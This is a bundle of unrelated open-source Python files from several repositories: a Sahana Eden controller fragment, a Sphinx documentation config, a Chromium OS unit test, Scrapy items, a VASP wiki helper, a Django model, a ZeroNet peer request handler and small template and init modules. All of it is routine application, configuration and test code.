table.delete_from_server.comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Delete"),
T("If this is set to True then mails will be deleted from the server after downloading.")))
# CRUD Strings
ADD_EMAIL_ACCOUNT = T("Add Email Account")
s3.crud_strings[tablename] = Storage(
title_display = T("Email Settings"),
title_list = T("Email Accounts"),
label_create = ADD_EMAIL_ACCOUNT,
title_update = T("Edit Email Settings"),
label_list_button = T("View Email Accounts"),
msg_record_created = T("Account added"),
msg_record_deleted = T("Email Account deleted"),
msg_list_empty = T("No Accounts currently defined"),
msg_record_modified = T("Email Settings updated")
)
return True
s3.prep = prep
def postp(r, output):
if r.interactive and isinstance(output, dict) and \
not s3task._is_alive():
poll_btn = A(T("Poll"),
_class="action-btn",
_href=URL(args=[r.id, "poll"])
)
output["rheader"] = poll_btn
return output
s3.postp = postp
return s3_rest_controller("msg")
# -----------------------------------------------------------------------------
def alert_recipient():
"""
RESTful CRUD controller for options.s3json lookups
- needed for adding recipients
"""
s3.prep = lambda r: r.method == "options" and r.representation == "s3json"
return s3_rest_controller()
# -----------------------------------------------------------------------------
# Messaging
#
def compose():
""" Send message to people/teams """
return s3db.hrm_compose()
# END =========================================================================
| gallifrey17/eden | controllers/deploy.py | Python | mit | 30,000 |
# -*- coding: utf-8 -*-
#
# icestudio documentation build configuration file, created by
# sphinx-quickstart on Thu May 26 11:44:15 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['source/_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Icestudio'
copyright = u'2016-2018, Jesús Arroyo Torrens'
author = u'Jesús Arroyo Torrens'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'0.3.3'
# The full version, including alpha/beta/rc tags.
release = u'0.3.3'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'None'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
class MyClass:
"""A simple example class"""
i = 12345
def f(self):
return 'hello world'
x = MyClass()
x.f()
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#html_title = u'icestudio v0.2a1'
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['source/_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'icestudiodoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'icestudio.tex', u'icestudio Documentation',
u'Jesús Arroyo Torrens', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'icestudio', u'icestudio Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'icestudio', u'icestudio Documentation',
author, 'icestudio', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The basename for the epub file. It defaults to the project name.
#epub_basename = project
# The HTML theme for the epub output. Since the default themes are not
# optimized for small screen space, using the same theme for HTML and epub
# output is usually not wise. This defaults to 'epub', a theme designed to save
# visual space.
#epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or 'en' if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using the Pillow.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True
| Jesus89/icestudio | docs/conf.py | Python | gpl-2.0 | 11,589 |
# -*- coding: utf-8 -*-
# Copyright (c) 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for cros_mark_chrome_as_stable.py."""
from __future__ import print_function
import base64
import os
import sys
from textwrap import dedent
import mock
from chromite.lib import constants
from chromite.lib import cros_build_lib
from chromite.lib import cros_test_lib
from chromite.lib import git
from chromite.lib import gob_util
from chromite.lib import osutils
from chromite.lib import partial_mock
from chromite.lib import portage_util
from chromite.scripts import cros_mark_chrome_as_stable
pytestmark = cros_test_lib.pytestmark_inside_only
assert sys.version_info >= (3, 6), 'This module requires Python 3.6+'
unstable_data = 'KEYWORDS=~x86 ~arm'
stable_data = 'KEYWORDS=x86 arm'
class CrosMarkChromeAsStable(cros_test_lib.MockTempDirTestCase):
"""Tests for cros_mark_chrome_as_stable."""
def setUp(self):
"""Setup vars and create mock dir."""
self.tmp_overlay = os.path.join(self.tempdir, 'chromiumos-overlay')
self.mock_chrome_dir = os.path.join(self.tmp_overlay, constants.CHROME_CP)
os.makedirs(self.mock_chrome_dir)
ebuild = os.path.join(self.mock_chrome_dir,
constants.CHROME_PN + '-%s.ebuild')
self.unstable = ebuild % '9999'
self.sticky_branch = '8.0.224'
self.sticky_version = '%s.503' % self.sticky_branch
self.sticky = ebuild % self.sticky_version
self.sticky_rc_version = '%s.504' % self.sticky_branch
self.sticky_rc = ebuild % (self.sticky_rc_version + '_rc-r1')
self.latest_stable_version = '8.0.300.1'
self.latest_stable = ebuild % (self.latest_stable_version + '_rc-r2')
self.tot_stable_version = '9.0.305.0'
self.tot_stable = ebuild % (self.tot_stable_version + '_alpha-r1')
self.sticky_new_rc_version = '%s.520' % self.sticky_branch
self.sticky_new_rc = ebuild % (self.sticky_new_rc_version + '_rc-r1')
self.latest_new_version = '9.0.305.1'
self.latest_new = ebuild % (self.latest_new_version + '_rc-r1')
self.tot_new_version = '9.0.306.0'
self.tot_new = ebuild % (self.tot_new_version + '_alpha-r1')
osutils.WriteFile(self.unstable, unstable_data)
osutils.WriteFile(self.sticky, stable_data)
osutils.WriteFile(self.sticky_rc, stable_data)
osutils.WriteFile(self.latest_stable, stable_data)
osutils.WriteFile(self.tot_stable, '')
def testFindChromeCandidates(self):
"""Test creation of stable ebuilds from mock dir."""
unstable, stable_ebuilds = cros_mark_chrome_as_stable.FindChromeCandidates(
self.mock_chrome_dir)
stable_ebuild_paths = [x.ebuild_path for x in stable_ebuilds]
self.assertEqual(unstable.ebuild_path, self.unstable)
self.assertEqual(len(stable_ebuilds), 4)
self.assertIn(self.sticky, stable_ebuild_paths)
self.assertIn(self.sticky_rc, stable_ebuild_paths)
self.assertIn(self.latest_stable, stable_ebuild_paths)
self.assertIn(self.tot_stable, stable_ebuild_paths)
def _GetStableEBuilds(self):
"""Common helper to create a list of stable ebuilds."""
return [
cros_mark_chrome_as_stable.ChromeEBuild(self.sticky),
cros_mark_chrome_as_stable.ChromeEBuild(self.sticky_rc),
cros_mark_chrome_as_stable.ChromeEBuild(self.latest_stable),
cros_mark_chrome_as_stable.ChromeEBuild(self.tot_stable),
]
def testTOTFindChromeUprevCandidate(self):
"""Tests if we can find tot uprev candidate from our mock dir data."""
stable_ebuilds = self._GetStableEBuilds()
candidate = cros_mark_chrome_as_stable.FindChromeUprevCandidate(
stable_ebuilds, constants.CHROME_REV_TOT,
self.sticky_branch)
self.assertEqual(candidate.ebuild_path, self.tot_stable)
def testLatestFindChromeUprevCandidate(self):
"""Tests if we can find latest uprev candidate from our mock dir data."""
stable_ebuilds = self._GetStableEBuilds()
candidate = cros_mark_chrome_as_stable.FindChromeUprevCandidate(
stable_ebuilds, constants.CHROME_REV_LATEST,
self.sticky_branch)
self.assertEqual(candidate.ebuild_path, self.latest_stable)
def testStickyFindChromeUprevCandidate(self):
"""Tests if we can find sticky uprev candidate from our mock dir data."""
stable_ebuilds = self._GetStableEBuilds()
candidate = cros_mark_chrome_as_stable.FindChromeUprevCandidate(
stable_ebuilds, constants.CHROME_REV_STICKY,
self.sticky_branch)
self.assertEqual(candidate.ebuild_path, self.sticky_rc)
def testGetTipOfTrunkRevision(self):
"""Tests if we can get the latest svn revision from TOT."""
A_URL = 'dorf://mink/delaane/forkat/sertiunu.ortg./desk'
result = {'log': [{'commit': 'deadbeef' * 5}]}
self.PatchObject(gob_util, 'FetchUrlJson', return_value=result)
revision = gob_util.GetTipOfTrunkRevision(A_URL)
self.assertEqual(revision, 'deadbeef' * 5)
def testGetTipOfTrunkVersion(self):
"""Tests if we get the latest version from TOT."""
TEST_URL = 'proto://host.org/path/to/repo'
TEST_VERSION_CONTENTS = dedent("""\
A=8
B=0
C=256
D=0""").encode('utf-8')
result = base64.b64encode(TEST_VERSION_CONTENTS)
self.PatchObject(gob_util, 'FetchUrl', return_value=result)
# pylint: disable=protected-access
version = cros_mark_chrome_as_stable._GetSpecificVersionUrl(
TEST_URL, 'test-revision')
self.assertEqual(version, '8.0.256.0')
def testCheckIfChromeRightForOS(self):
"""Tests if we can find the chromeos build from our mock DEPS."""
test_data1 = "buildspec_platforms:\n 'chromeos,',\n"
test_data2 = "buildspec_platforms:\n 'android,',\n"
expected_deps = cros_mark_chrome_as_stable.CheckIfChromeRightForOS(
test_data1)
unexpected_deps = cros_mark_chrome_as_stable.CheckIfChromeRightForOS(
test_data2)
self.assertTrue(expected_deps)
self.assertFalse(unexpected_deps)
def testGetLatestRelease(self):
"""Tests if we can find the latest release from our mock url data."""
TEST_HOST = 'sores.chromium.org'
TEST_URL = 'phthp://%s/tqs' % TEST_HOST
TEST_TAGS = ['7.0.224.1', '7.0.224', '8.0.365.5', 'foo', 'bar-12.13.14.15']
TEST_REFS_JSON = dict((tag, None) for tag in TEST_TAGS)
TEST_BAD_DEPS_CONTENT = dedent("""\
buildspec_platforms: 'TRS-80,',
""").encode('utf-8')
TEST_GOOD_DEPS_CONTENT = dedent("""\
buildspec_platforms: 'chromeos,',
""").encode('utf-8')
self.PatchObject(gob_util, 'FetchUrl', side_effect=(
base64.b64encode(TEST_BAD_DEPS_CONTENT),
base64.b64encode(TEST_GOOD_DEPS_CONTENT),
))
self.PatchObject(gob_util, 'FetchUrlJson', side_effect=(TEST_REFS_JSON,))
release = cros_mark_chrome_as_stable.GetLatestRelease(TEST_URL)
self.assertEqual('7.0.224.1', release)
def testGetLatestStickyRelease(self):
"""Tests if we can find the latest sticky release from our mock url data."""
TEST_HOST = 'sores.chromium.org'
TEST_URL = 'phthp://%s/tqs' % TEST_HOST
TEST_TAGS = ['7.0.224.2', '7.0.224', '7.0.365.5', 'foo', 'bar-12.13.14.15']
TEST_REFS_JSON = dict((tag, None) for tag in TEST_TAGS)
TEST_DEPS_CONTENT = dedent("""\
buildspec_platforms: 'chromeos,',
""").encode('utf-8')
self.PatchObject(gob_util, 'FetchUrl', side_effect=(
base64.b64encode(TEST_DEPS_CONTENT),
))
self.PatchObject(gob_util, 'FetchUrlJson', side_effect=(TEST_REFS_JSON,))
release = cros_mark_chrome_as_stable.GetLatestRelease(TEST_URL, '7.0.224')
self.assertEqual('7.0.224.2', release)
def testLatestChromeRevisionListLink(self):
"""Tests link generation to rev lists.
Verifies that we can generate a link to the revision list between the
latest Chromium release and the last one we successfully built.
"""
osutils.WriteFile(self.latest_new, stable_data)
expected = cros_mark_chrome_as_stable.GetChromeRevisionLinkFromVersions(
self.latest_stable_version, self.latest_new_version)
made = cros_mark_chrome_as_stable.GetChromeRevisionListLink(
cros_mark_chrome_as_stable.ChromeEBuild(self.latest_stable),
cros_mark_chrome_as_stable.ChromeEBuild(self.latest_new),
constants.CHROME_REV_LATEST)
self.assertEqual(expected, made)
def testStickyEBuild(self):
"""Tests if we can find the sticky ebuild from our mock directories."""
# pylint: disable=protected-access
stable_ebuilds = self._GetStableEBuilds()
sticky_ebuild = cros_mark_chrome_as_stable._GetStickyEBuild(
stable_ebuilds)
self.assertEqual(sticky_ebuild.chrome_version, self.sticky_version)
def testChromeEBuildInit(self):
"""Tests if the chrome_version is set correctly in a ChromeEBuild."""
ebuild = cros_mark_chrome_as_stable.ChromeEBuild(self.sticky)
self.assertEqual(ebuild.chrome_version, self.sticky_version)
def _CommonMarkAsStableTest(self, chrome_rev, new_version, old_ebuild_path,
new_ebuild_path, commit_string_indicator):
"""Common function used for test functions for MarkChromeEBuildAsStable.
This function stubs out others calls, and runs MarkChromeEBuildAsStable
with the specified args.
Args:
chrome_rev: standard chrome_rev argument
new_version: version we are revving up to
old_ebuild_path: path to the stable ebuild
new_ebuild_path: path to the to be created path
commit_string_indicator: a string that the commit message must contain
"""
self.PatchObject(cros_build_lib, 'run',
side_effect=Exception('should not be called'))
self.PatchObject(portage_util.EBuild, 'GetCrosWorkonVars',
return_value=None)
git_mock = self.PatchObject(git, 'RunGit')
commit_mock = self.PatchObject(portage_util.EBuild, 'CommitChange')
stable_candidate = cros_mark_chrome_as_stable.ChromeEBuild(old_ebuild_path)
unstable_ebuild = cros_mark_chrome_as_stable.ChromeEBuild(self.unstable)
chrome_pn = 'chromeos-chrome'
chrome_version = new_version
package_dir = self.mock_chrome_dir
cros_mark_chrome_as_stable.MarkChromeEBuildAsStable(
stable_candidate, unstable_ebuild, chrome_pn, chrome_rev,
chrome_version, package_dir)
git_mock.assert_has_calls([
mock.call(package_dir, ['add', new_ebuild_path]),
mock.call(package_dir, ['rm', old_ebuild_path]),
])
commit_mock.assert_called_with(
partial_mock.HasString(commit_string_indicator),
package_dir)
def testStickyMarkAsStable(self):
"""Tests to see if we can mark chrome as stable for a new sticky release."""
self._CommonMarkAsStableTest(
constants.CHROME_REV_STICKY,
self.sticky_new_rc_version, self.sticky_rc,
self.sticky_new_rc, 'stable_release')
def testLatestMarkAsStable(self):
"""Tests to see if we can mark chrome for a latest release."""
self._CommonMarkAsStableTest(
constants.CHROME_REV_LATEST,
self.latest_new_version, self.latest_stable,
self.latest_new, 'latest_release')
def testTotMarkAsStable(self):
"""Tests to see if we can mark chrome for tot."""
self._CommonMarkAsStableTest(
constants.CHROME_REV_TOT,
self.tot_new_version, self.tot_stable,
self.tot_new, 'tot')
| endlessm/chromium-browser | third_party/chromite/scripts/cros_mark_chrome_as_stable_unittest.py | Python | bsd-3-clause | 11,462 |
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
from scrapy.item import Item, Field
class WeibozItem(Item):
# define the fields for your item here like:
# name = scrapy.Field()
mblogid = Field(serializer=str) # 微博内容id
created_at = Field(serializer=str) # 说说时间
comments_count = Field(serializer=int) # 评论数
reposts_count = Field(serializer=int) # 转发数
like_count = Field(serializer=int) # 点赞数
text = Field(serializer=str) # 正文内容
scheme = Field(serializer=str) # 微博地址
user = Field() # 用户名\粉丝数\说说数
#后期处理需要用到的字段
admin=Field()
price=Field()
tag=Field()
| luzhijun/weiboSA | _site/weiboZ/items.py | Python | apache-2.0 | 805 |
"""
Get help with VASP parameters from VASP wiki.
"""
import re
import requests
import urllib3
from bs4 import BeautifulSoup
class VaspDoc:
"""
A VASP documentation helper.
"""
def __init__(self):
"""
Init for VaspDoc.
"""
self.url_template = "http://www.vasp.at/wiki/index.php/%s"
urllib3.disable_warnings()
def print_help(self, tag):
"""
Print the help for a TAG.
Args:
tag (str): Tag used in VASP.
"""
print(self.get_help(tag))
def print_jupyter_help(self, tag):
"""
Display HTML help in ipython notebook.
Args:
tag (str): Tag used in VASP.
"""
help = self.get_help(tag, "html")
from IPython.core.display import HTML, display
display(HTML(help))
@classmethod
def get_help(cls, tag, fmt="text"):
"""
Get help on a VASP tag.
Args:
tag (str): VASP tag, e.g., ISYM.
Returns:
Help text.
"""
tag = tag.upper()
r = requests.get("http://www.vasp.at/wiki/index.php/%s" % tag, verify=False)
soup = BeautifulSoup(r.text)
main_doc = soup.find(id="mw-content-text")
if fmt == "text":
output = main_doc.text
output = re.sub("\n{2,}", "\n\n", output)
else:
output = str(main_doc)
return output
@classmethod
def get_incar_tags(cls):
"""
Returns: All incar tags
"""
tags = []
for page in [
"http://www.vasp.at/wiki/index.php/Category:INCAR",
"http://www.vasp.at/wiki/index.php?title=Category:INCAR&pagefrom=ML+FF+LCONF+DISCARD#mw-pages",
]:
r = requests.get(page, verify=False)
soup = BeautifulSoup(r.text)
for div in soup.findAll("div", {"class": "mw-category-group"}):
children = div.findChildren("li")
for child in children:
tags.append(child.text.strip())
return tags
if __name__ == "__main__":
doc = VaspDoc()
doc.print_help("ISYM")
print(doc.get_incar_tags())
| vorwerkc/pymatgen | pymatgen/io/vasp/help.py | Python | mit | 2,205 |
from django.db import models
from datetime import datetime
from isecho.settings import LANGUAGES
class Flatpage(models.Model):
title = models.CharField(max_length=200, blank=False)
slug = models.SlugField()
body = models.TextField()
date = models.DateField(blank=False, default=datetime.now())
language = models.CharField(max_length=6, blank=False, choices=LANGUAGES, default="en")
| mrafieee/django-base | apps/flatpages/models.py | Python | gpl-3.0 | 406 |
# Included modules
import socket
import struct
import os
from cStringIO import StringIO
# Third party modules
import gevent
from Debug import Debug
from Config import config
from util import RateLimit, StreamingMsgpack
FILE_BUFF = 1024*512
# Request from me
class FileRequest(object):
__slots__ = ("server", "connection", "req_id", "sites", "log", "responded")
def __init__(self, server, connection):
self.server = server
self.connection = connection
self.req_id = None
self.sites = self.server.sites
self.log = server.log
self.responded = False # Responded to the request
def unpackAddress(self, packed):
return socket.inet_ntoa(packed[0:4]), struct.unpack_from("H", packed, 4)[0]
def send(self, msg, streaming=False):
if not self.connection.closed:
self.connection.send(msg, streaming)
def response(self, msg, streaming=False):
if self.responded:
self.log.debug("Req id %s already responded" % self.req_id)
return
if not isinstance(msg, dict): # If msg not a dict create a {"body": msg}
msg = {"body": msg}
msg["cmd"] = "response"
msg["to"] = self.req_id
self.responded = True
self.send(msg, streaming=streaming)
# Route file requests
def route(self, cmd, req_id, params):
self.req_id = req_id
if cmd == "getFile":
self.actionGetFile(params)
elif cmd == "update":
event = "%s update %s %s" % (self.connection.id, params["site"], params["inner_path"])
if not RateLimit.isAllowed(event): # There was already an update for this file in the last 10 second
self.response({"ok": "File update queued"})
# If called more than once within 10 sec only keep the last update
RateLimit.callAsync(event, 10, self.actionUpdate, params)
elif cmd == "pex":
self.actionPex(params)
elif cmd == "listModified":
self.actionListModified(params)
elif cmd == "ping":
self.actionPing()
else:
self.actionUnknown(cmd, params)
# Update a site file request
def actionUpdate(self, params):
site = self.sites.get(params["site"])
if not site or not site.settings["serving"]: # Site unknown or not serving
self.response({"error": "Unknown site"})
return False
if site.settings["own"] and params["inner_path"].endswith("content.json"):
self.log.debug("Someone trying to push a file to own site %s, reload local %s first" % (site.address, params["inner_path"]))
changed = site.content_manager.loadContent(params["inner_path"], add_bad_files=False)
if changed: # Content.json changed locally
site.settings["size"] = site.content_manager.getTotalSize() # Update site size
buff = StringIO(params["body"])
valid = site.content_manager.verifyFile(params["inner_path"], buff)
if valid == True: # Valid and changed
self.log.info("Update for %s looks valid, saving..." % params["inner_path"])
buff.seek(0)
site.storage.write(params["inner_path"], buff)
site.onFileDone(params["inner_path"]) # Trigger filedone
if params["inner_path"].endswith("content.json"): # Download every changed file from peer
peer = site.addPeer(self.connection.ip, self.connection.port, return_peer = True) # Add or get peer
site.onComplete.once(lambda: site.publish(inner_path=params["inner_path"]), "publish_%s" % params["inner_path"]) # On complete publish to other peers
gevent.spawn(
lambda: site.downloadContent(params["inner_path"], peer=peer)
) # Load new content file and download changed files in new thread
self.response({"ok": "Thanks, file %s updated!" % params["inner_path"]})
elif valid == None: # Not changed
peer = site.addPeer(*params["peer"], return_peer = True) # Add or get peer
if peer:
self.log.debug("Same version, adding new peer for locked files: %s, tasks: %s" % (peer.key, len(site.worker_manager.tasks)) )
for task in site.worker_manager.tasks: # New peer add to every ongoing task
if task["peers"]: site.needFile(task["inner_path"], peer=peer, update=True, blocking=False) # Download file from this peer too if its peer locked
self.response({"ok": "File not changed"})
else: # Invalid sign or sha1 hash
self.log.debug("Update for %s is invalid" % params["inner_path"])
self.response({"error": "File invalid"})
# Send file content request
def actionGetFile(self, params):
site = self.sites.get(params["site"])
if not site or not site.settings["serving"]: # Site unknown or not serving
self.response({"error": "Unknown site"})
return False
try:
file_path = site.storage.getPath(params["inner_path"])
if config.debug_socket: self.log.debug("Opening file: %s" % file_path)
with StreamingMsgpack.FilePart(file_path, "rb") as file:
file.seek(params["location"])
file.read_bytes = FILE_BUFF
back = {"body": file,
"size": os.fstat(file.fileno()).st_size,
"location": min(file.tell()+FILE_BUFF, os.fstat(file.fileno()).st_size)
}
if config.debug_socket:
self.log.debug("Sending file %s from position %s to %s" % (file_path,
params["location"],
back["location"]))
self.response(back, streaming=True)
if config.debug_socket:
self.log.debug("File %s sent" % file_path)
# Add peer to site if not added before
connected_peer = site.addPeer(self.connection.ip, self.connection.port)
if connected_peer: # Just added
connected_peer.connect(self.connection) # Assign current connection to peer
except Exception, err:
self.log.debug("GetFile read error: %s" % Debug.formatException(err))
self.response({"error": "File read error: %s" % Debug.formatException(err)})
return False
# Peer exchange request
def actionPex(self, params):
site = self.sites.get(params["site"])
if not site or not site.settings["serving"]: # Site unknown or not serving
self.response({"error": "Unknown site"})
return False
got_peer_keys = []
added = 0
connected_peer = site.addPeer(self.connection.ip, self.connection.port) # Add requester peer to site
if connected_peer: # Just added
added += 1
connected_peer.connect(self.connection) # Assign current connection to peer
for peer in params["peers"]: # Add sent peers to site
address = self.unpackAddress(peer)
got_peer_keys.append("%s:%s" % address)
if site.addPeer(*address): added += 1
# Send back peers that is not in the sent list and connectable (not port 0)
packed_peers = [peer.packAddress() for peer in site.getConnectablePeers(params["need"], got_peer_keys)]
if added:
site.worker_manager.onPeers()
self.log.debug("Added %s peers to %s using pex, sending back %s" % (added, site, len(packed_peers)))
self.response({"peers": packed_peers})
# Get modified content.json files since
def actionListModified(self, params):
site = self.sites.get(params["site"])
if not site or not site.settings["serving"]: # Site unknown or not serving
self.response({"error": "Unknown site"})
return False
modified_files = {inner_path: content["modified"]
for inner_path, content in site.content_manager.contents.iteritems()
if content["modified"] > params["since"]}
# Add peer to site if not added before
connected_peer = site.addPeer(self.connection.ip, self.connection.port)
if connected_peer: # Just added
connected_peer.connect(self.connection) # Assign current connection to peer
self.response({"modified_files": modified_files})
# Send a simple Pong! answer
def actionPing(self):
self.response("Pong!")
# Unknown command
def actionUnknown(self, cmd, params):
self.response({"error": "Unknown command: %s" % cmd})
| rarbg/ZeroNet | src/File/FileRequest.py | Python | gpl-2.0 | 8,834 |
import pkg_resources
from string import Template
model_template = Template(pkg_resources.resource_string(__name__, "model_template.C"))
lorentz_calc_template = Template(pkg_resources.resource_string(__name__, "lorentz_calc_template.C"))
sconstruct_template = Template(pkg_resources.resource_string(__name__, "sconstruct_template"))
run_card_template = Template(pkg_resources.resource_string(__name__, "run_card_template"))
| cms-externals/sherpa | MODEL/UFO/templates.py | Python | gpl-3.0 | 427 |
# Copyright © 2020, Joseph Berry, Rico Tabor (opendrop.dev@gmail.com)
# OpenDrop is released under the GNU GPL License. You are free to
# modify and distribute the code, but always under the same license
#
# If you use this software in your research, please cite the following
# journal articles:
#
# J. D. Berry, M. J. Neeson, R. R. Dagastine, D. Y. C. Chan and
# R. F. Tabor, Measurement of surface and interfacial tension using
# pendant drop tensiometry. Journal of Colloid and Interface Science 454
# (2015) 226–237. https://doi.org/10.1016/j.jcis.2015.05.012
#
# E. Huang, T. Denning, A. Skoufis, J. Qi, R. R. Dagastine, R. F. Tabor
# and J. D. Berry, OpenDrop: Open-source software for pendant drop
# tensiometry & contact angle measurements, submitted to the Journal of
# Open Source Software
#
# These citations help us not only to understand who is using and
# developing OpenDrop, and for what purpose, but also to justify
# continued development of this code and other open source resources.
#
# OpenDrop is distributed WITHOUT ANY WARRANTY; without even the
# implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details. You
# should have received a copy of the GNU General Public License along
# with this software. If not, see <https://www.gnu.org/licenses/>.
from .component import ComponentSymbol
from .view import View
